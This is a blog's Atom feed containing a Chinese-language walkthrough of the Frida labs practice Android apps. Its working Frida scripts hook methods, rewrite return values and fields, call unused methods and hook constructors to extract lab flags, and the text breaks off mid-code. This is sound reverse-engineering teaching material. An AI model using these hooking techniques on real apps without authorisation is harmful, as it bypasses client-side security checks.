<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>花开再美,怎如初见</title>
<link href="https://shenshuoyaoyouguangha.github.io/atom.xml" rel="self"/>
<link href="https://shenshuoyaoyouguangha.github.io/"/>
<updated>2024-07-03T09:56:18.730Z</updated>
<id>https://shenshuoyaoyouguangha.github.io/</id>
<author>
<name>F1nGY3</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>pwn</title>
<link href="https://shenshuoyaoyouguangha.github.io/2024/07/03/pwn/"/>
<id>https://shenshuoyaoyouguangha.github.io/2024/07/03/pwn/</id>
<published>2024-07-03T09:41:45.000Z</published>
<updated>2024-07-03T09:56:18.730Z</updated>
<content type="html"><![CDATA[<h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><p>hello,world!</p>]]></content>
<summary type="html"><h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><p>hello,world!</p>
</summary>
</entry>
<entry>
<title>frida_labs</title>
<link href="https://shenshuoyaoyouguangha.github.io/2024/07/03/frida-labs/"/>
<id>https://shenshuoyaoyouguangha.github.io/2024/07/03/frida-labs/</id>
<published>2024-07-03T08:44:04.000Z</published>
<updated>2024-07-03T08:53:23.977Z</updated>
<content type="html"><![CDATA[<p>[<a href="https://bbs.kanxue.com/thread-280758.htm#msg_header_h3_1">原创]Frida-Hook-Java层操作大全-Android安全-看雪-安全社区|安全招聘|kanxue.com</a></p><p>[<a href="https://bbs.kanxue.com/thread-280812.htm">原创]Frida-Hook-Native层操作大全-Android安全-看雪-安全社区|安全招聘|kanxue.com</a></p><h2 id="Frida-0x1"><a href="#Frida-0x1" class="headerlink" title="Frida 0x1"></a>Frida 0x1</h2><h3 id="修改函数返回值-给函数传自定义参数"><a href="#修改函数返回值-给函数传自定义参数" class="headerlink" title="修改函数返回值&&给函数传自定义参数"></a>修改函数返回值&&给函数传自定义参数</h3><p>程序的主要逻辑是调用一个random的函数,然后对我们的输入进行检测是否是数字,如果是就使用check函数对随机数和我们输入的数进行对比,如果正确则输出flag</p><p><img src="/./assets/image-20240603150155414.png" alt="image-20240603150155414"></p><p>对于hook来讲,可以直接hookr random使其固定返回一个值,活着hook check函数,手动传入值</p><blockquote><ul><li><code>Java.perform</code> 是 Frida 中用于创建一个特殊上下文的函数,让你的脚本能够与 Android 应用程序中的 Java 代码进行交互。它就像是打开了一扇门,让你能够访问并操纵应用程序内部运行的 Java 代码。一旦进入这个上下文,你就可以执行诸如钩取方法或访问 Java 类等操作来控制或观察应用程序的行为。</li><li><code>var <class_reference> = Java.use("<package_name>.<class>");</code><br>在这里,你声明一个变量 <code><class_reference></code> 来表示目标 Android 应用程序中的一个 Java 类。你使用 <code>Java.use</code> 函数指定要使用的类,该函数接受类名作为参数。<code><package_name></code> 表示 Android 应用程序的包名,<code><class></code> 表示你想要与之交互的类。</li><li><code><class_reference>.<method_to_hook>.implementation = function(<args>) {}</code><br>在所选的类内部,通过 <code><class_reference>.<method_to_hook></code> 符号访问你想要钩取的方法。这是你可以定义自己的逻辑以在钩取的方法被调用时执行的地方。<code><args></code> 表示传递给函数的参数。</li></ul></blockquote><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">MainActivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x1.MainActivity"</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-property">get_random</span>.<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br> }<br>}<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook2</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Mainactivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">'com.ad2001.frida0x1.MainActivity'</span>);<br> <span class="hljs-title class_">Mainactivity</span>.<span class="hljs-property">check</span>.<span class="hljs-title function_">overload</span>(<span class="hljs-string">'int'</span>,<span class="hljs-string">'int'</span>).<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params">a,b</span>){<br> a=<span class="hljs-number">0</span>;<br> b=<span class="hljs-number">4</span>;<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span 
class="hljs-string">"i1 and i2 = "</span>,a,b);<br> <span class="hljs-keyword">return</span> <span class="hljs-variable language_">this</span>.<span class="hljs-title function_">check</span>(a,b);<br> }<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br></code></pre></td></tr></table></figure><span id="more"></span> <h2 id="Frida-0x2"><a href="#Frida-0x2" class="headerlink" title="Frida 0x2"></a>Frida 0x2</h2><h3 id="调用程序未调用的函数"><a href="#调用程序未调用的函数" class="headerlink" title="调用程序未调用的函数"></a>调用程序未调用的函数</h3><p><img src="/./assets/image-20240603191319536.png" alt="image-20240603191319536"></p><p>使用setImmediate的时候可能会hook不到,猜测是hook的截取时间比main的启动时间早了,所以使用settimeout延迟一会hook就能hook到了</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">MainActivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span 
class="hljs-string">"com.ad2001.frida0x2.MainActivity"</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-title function_">get_flag</span>(<span class="hljs-number">4919</span>);<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br><br># ffrida -<span class="hljs-variable constant_">UF</span> -l <span class="hljs-number">1.</span>js<br></code></pre></td></tr></table></figure><h2 id="Frida-0x3"><a href="#Frida-0x3" class="headerlink" title="Frida 0x3"></a>Frida 0x3</h2><h3 id="更改类中的静态变量"><a href="#更改类中的静态变量" class="headerlink" title="更改类中的静态变量"></a>更改类中的静态变量</h3><p>类似于如下写法static int code = 0;<br>使用static 修饰的变量则为静态变量。我们可以用如下方法更改静态变量</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br><br><span class="hljs-keyword">var</span> <class_reference> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"<package_name>.<class>"</span>);<br><class_reference>.<variable>.<span class="hljs-property">value</span> = <value>;<br><br>})<br></code></pre></td></tr></table></figure><p><img 
src="/./assets/image-20240603171040737.png" alt="image-20240603171040737"></p><p><img src="/./assets/image-20240603171055917.png" alt="image-20240603171055917"></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x3.Checker"</span>);<br> <span class="hljs-title class_">Checker</span>.<span class="hljs-property">code</span>.<span class="hljs-property">value</span>=<span class="hljs-number">512</span>;<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br><span class="hljs-comment">// setTimeout(main,1000);</span><br></code></pre></td></tr></table></figure><h2 id="Frida-0x4"><a href="#Frida-0x4" class="headerlink" title="Frida 0x4"></a>Frida 0x4</h2><h3 id="调用非MainActivity-非静态方法"><a href="#调用非MainActivity-非静态方法" class="headerlink" 
title="调用非MainActivity,非静态方法"></a>调用非MainActivity,非静态方法</h3><p>在JAVA代码中,如果创建了一个非静态的类,当我们需要使用这个类的时候需要new一个类的对象出来我们才能使用这个类的功能。类似代码如下:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Check</span> ch = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Check</span>();<br><span class="hljs-title class_">String</span> flag = ch.<span class="hljs-title function_">get_flag</span>(<span class="hljs-number">1337</span>);<br></code></pre></td></tr></table></figure><p>那么在Java源码中需要new出来的实例,我们怎么使用Frida来实现呢?<br>模板如下:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) {<br> <br> <span class="hljs-keyword">var</span> <class_reference> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"<package_name>.<class>"</span>);<br> <span class="hljs-keyword">var</span> <class_instance> = <class_reference>.$new(); <span class="hljs-comment">// Class Object</span><br> <class_instance>.<method>(); <span class="hljs-comment">// 调用方法</span><br> <br>})<br></code></pre></td></tr></table></figure><blockquote><p>静态类和非静态类的区别,非静态类可以被实例化,就像一个结构体一样,而静态类就像函数一样是直接传入值调用的</p></blockquote><p>例子:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-comment">//静态类</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">MathUtilities</span><br>{<br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">Add</span><span class="hljs-params">(<span class="hljs-type">int</span> a, <span class="hljs-type">int</span> b)</span><br> {<br> <span class="hljs-keyword">return</span> a + b;<br> }<br> <br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title 
function_">Subtract</span><span class="hljs-params">(<span class="hljs-type">int</span> a, <span class="hljs-type">int</span> b)</span><br> {<br> <span class="hljs-keyword">return</span> a - b;<br> }<br>}<br><br><span class="hljs-comment">// 调用静态方法</span><br><span class="hljs-type">int</span> <span class="hljs-variable">sum</span> <span class="hljs-operator">=</span> MathUtilities.Add(<span class="hljs-number">3</span>, <span class="hljs-number">5</span>);<br><span class="hljs-type">int</span> <span class="hljs-variable">difference</span> <span class="hljs-operator">=</span> MathUtilities.Subtract(<span class="hljs-number">10</span>, <span class="hljs-number">4</span>);<br><br><span class="hljs-comment">//非静态类</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Person</span><br>{<br> <span class="hljs-keyword">public</span> string Name { get; set; }<br> <span class="hljs-keyword">public</span> <span class="hljs-type">int</span> Age { get; set; }<br><br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">Introduce</span><span class="hljs-params">()</span><br> {<br> Console.WriteLine($<span class="hljs-string">"Hi, my name is {Name} and I am {Age} years old."</span>);<br> }<br>}<br><br><span class="hljs-comment">// 创建对象</span><br><span class="hljs-type">Person</span> <span class="hljs-variable">person1</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Person</span>();<br>person1.Name = <span class="hljs-string">"Alice"</span>;<br>person1.Age = <span class="hljs-number">30</span>;<br>person1.Introduce(); <span class="hljs-comment">// 输出: Hi, my name is Alice and I am 30 years old.</span><br><br><span class="hljs-type">Person</span> <span class="hljs-variable">person2</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title 
class_">Person</span>();<br>person2.Name = <span class="hljs-string">"Bob"</span>;<br>person2.Age = <span class="hljs-number">25</span>;<br>person2.Introduce(); <span class="hljs-comment">// 输出: Hi, my name is Bob and I am 25 years old.</span><br><br><br></code></pre></td></tr></table></figure><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'hook succse'</span>);<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Check</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x4.Check"</span>);<br> <span class="hljs-keyword">var</span> check_obj = <span class="hljs-title class_">Check</span>.$new();<br> <span class="hljs-keyword">var</span> string = check_obj.<span class="hljs-title function_">get_flag</span>(<span class="hljs-number">1337</span>);<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(string)<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title 
function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br><span class="hljs-comment">// setTimeout(main,1000);</span><br></code></pre></td></tr></table></figure><h2 id="Frida-0x5"><a href="#Frida-0x5" class="headerlink" title="Frida 0x5"></a>Frida 0x5</h2><h3 id="调用MainActivity中的非静态方法-与0x4区分"><a href="#调用MainActivity中的非静态方法-与0x4区分" class="headerlink" title="调用MainActivity中的非静态方法(与0x4区分)"></a>调用MainActivity中的非静态方法(与0x4区分)</h3><p>直接使用Frida创建<code>MainActivity</code>或任何Android组件可能会很棘手,因为Android的生命周期和线程规则。Android组件,如<code>Activity</code>子类,依赖于应用程序上下文进行正确运行。在Frida中,您可能缺少必要的上下文。Android UI组件通常需要具有关联<code>Looper</code>的特定线程。如果涉及UI任务,请确保在具有活动<code>Looper</code>的主线程上执行。活动是较大的Android应用程序生命周期的一部分。创建<code>MainActivity</code>的实例可能需要应用处于特定状态,并且通过Frida管理整个生命周期可能并不直接。总之,为<code>MainActivity</code>创建实例并不是一个好主意。</p><p>那么这里的解决方案是什么呢?</p><p>当Android应用程序启动时,系统会创建<code>MainActivity</code>的一个实例(或AndroidManifest.xml文件中指定的启动器活动)。创建<code>MainActivity</code>实例是Android应用程序生命周期的一部分。因此,我们可以使用frida获取<code>MainActivity</code>的实例,然后调用<code>flag()</code>方法来获取我们的标志。</p><h3 id="在现有实例上调用方法"><a href="#在现有实例上调用方法" class="headerlink" title="在现有实例上调用方法"></a>在现有实例上调用方法</h3><p>在现有实例上调用方法可以很容易地通过Frida完成。为此,我们将使用两个API。</p><ul><li><code>Java.performNow</code>:用于在Java运行时环境中执行代码的函数。</li><li><code>Java.choose</code>:在运行时枚举指定Java类(作为第一个参数提供)的实例。</li></ul><p>模板:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Java</span>.<span class="hljs-title function_">performNow</span>(<span 
class="hljs-keyword">function</span>(<span class="hljs-params"></span>) {<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">choose</span>(<span class="hljs-string">'<包名>.<类名>'</span>, {<br> <span class="hljs-attr">onMatch</span>: <span class="hljs-keyword">function</span>(<span class="hljs-params">instance</span>) {<br> <span class="hljs-comment">// 待办事项</span><br> },<br> <span class="hljs-attr">onComplete</span>: <span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) {}<br> });<br>});<br></code></pre></td></tr></table></figure><p>这里有两个回调函数:</p><ul><li>onMatch<ul><li><code>onMatch</code>回调函数在<code>Java.choose</code>操作期间找到指定类的每个实例时执行。</li><li>这个回调函数接收当前实例作为它的参数。</li><li>您可以在<code>onMatch</code>回调中定义自定义操作,以在每个实例上执行。</li><li><code>function(instance) {}</code>,<code>instance</code>参数表示目标类的每个匹配实例。您可以使用任何其他名称。</li></ul></li><li>onComplete<ul><li><code>onComplete</code>回调在<code>Java.choose</code>操作完成后执行操作或清理任务。此块是可选的,如果您在搜索完成后不需要执行任何特定操作,则可以选择将其留空。</li></ul></li></ul><p><img src="/./assets/image-20240603192751063.png" alt="image-20240603192751063"></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">choose</span>(<span 
class="hljs-string">'com.ad2001.frida0x5.MainActivity'</span>, {<br> <span class="hljs-attr">onMatch</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">MainActivity</span>) {<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-title function_">flag</span>(<span class="hljs-number">1337</span>);<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'hook succse'</span>)<br> },<br> <span class="hljs-attr">onComplete</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params"></span>) {}<br> });<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br><span class="hljs-comment">// setTimeout(main,1000);</span><br></code></pre></td></tr></table></figure><p><img src="/./assets/image-20240603193446665.png" alt="image-20240603193446665"></p><h2 id="Frida-0x6"><a href="#Frida-0x6" class="headerlink" title="Frida 0x6"></a>Frida 0x6</h2><h3 id="MainActivity中非静态并且参数为非静态变量方法调用"><a href="#MainActivity中非静态并且参数为非静态变量方法调用" class="headerlink" title="MainActivity中非静态并且参数为非静态变量方法调用"></a>MainActivity中非静态并且参数为非静态变量方法调用</h3><ul><li>创建一个<code>Checker</code>类的实例。</li><li>将<code>num1</code>设置为1234,<code>num2</code>设置为4321。</li><li>获取<code>MainActivity</code>的实例。</li><li>使用实例作为参数调用<code>get_flag</code>方法。</li></ul><p>MainActivity没有调用的一个非静态方法,非静态方法中设置一组非静态变量,这就相当于结合了上面学的两种方法,可以先使用frida 0x3的方法更改类的变量,然后再使用frida 0x5的方式调用mainactivity的非静态方法</p><p><img src="/./assets/image-20240603200154611.png" alt="image-20240603200154611"></p><figure class="highlight js"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">choose</span>(<span class="hljs-string">'com.ad2001.frida0x6.MainActivity'</span>,<br> {<br> <span class="hljs-attr">onMatch</span>:<span class="hljs-keyword">function</span> (<span class="hljs-params">MainActivity</span>){<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'hook succse'</span>);<br><br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">'com.ad2001.frida0x6.Checker'</span>)<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span>_obj = <span class="hljs-title class_">Checker</span>.$new()<br> <span class="hljs-title class_">Checker</span>_obj.<span class="hljs-property">num1</span>.<span class="hljs-property">value</span> = <span class="hljs-number">1234</span>;<br> 
<span class="hljs-title class_">Checker</span>_obj.<span class="hljs-property">num2</span>.<span class="hljs-property">value</span> = <span class="hljs-number">4321</span>;<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-title class_">Checker</span>_obj.<span class="hljs-property">num1</span>.<span class="hljs-property">value</span>,<span class="hljs-title class_">Checker</span>_obj.<span class="hljs-property">num2</span>.<span class="hljs-property">value</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-title function_">get_flag</span>(<span class="hljs-title class_">Checker</span>_obj);<br> },<br> <span class="hljs-attr">onComplete</span>:<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>){}<br> })<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br><span class="hljs-comment">// setTimeout(main,1000);</span><br></code></pre></td></tr></table></figure><h2 id="Frida-0x7"><a href="#Frida-0x7" class="headerlink" title="Frida 0x7"></a>Frida 0x7</h2><h3 id="Hook构造函数"><a href="#Hook构造函数" class="headerlink" title="Hook构造函数"></a>Hook构造函数</h3><p>挂钩构造函数十分简单,与挂钩方法类似。让我为您提供一个模板。</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) {<br> <span class="hljs-keyword">var</span> <class_reference> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"<package_name>.<class>"</span>);<br> <class_reference>.<span class="hljs-property">$init</span>.<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span>(<span class="hljs-params"><args></span>){<br> <br> <span class="hljs-comment">/*</span><br><span class="hljs-comment"> </span><br><span class="hljs-comment"> */</span><br> <br> }<br>});<br></code></pre></td></tr></table></figure><p>构造函数的方法:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x7.Checker"</span>);<br> <span class="hljs-title class_">Checker</span>.<span class="hljs-property">$init</span>.<span 
class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params">a,b</span>){<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Origin num"</span>,a,b);<br> <span class="hljs-variable language_">this</span>.$init(<span class="hljs-number">600</span>,<span class="hljs-number">600</span>);<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Hook Success"</span>);<br> }<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br></code></pre></td></tr></table></figure><p>改值的方法:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title 
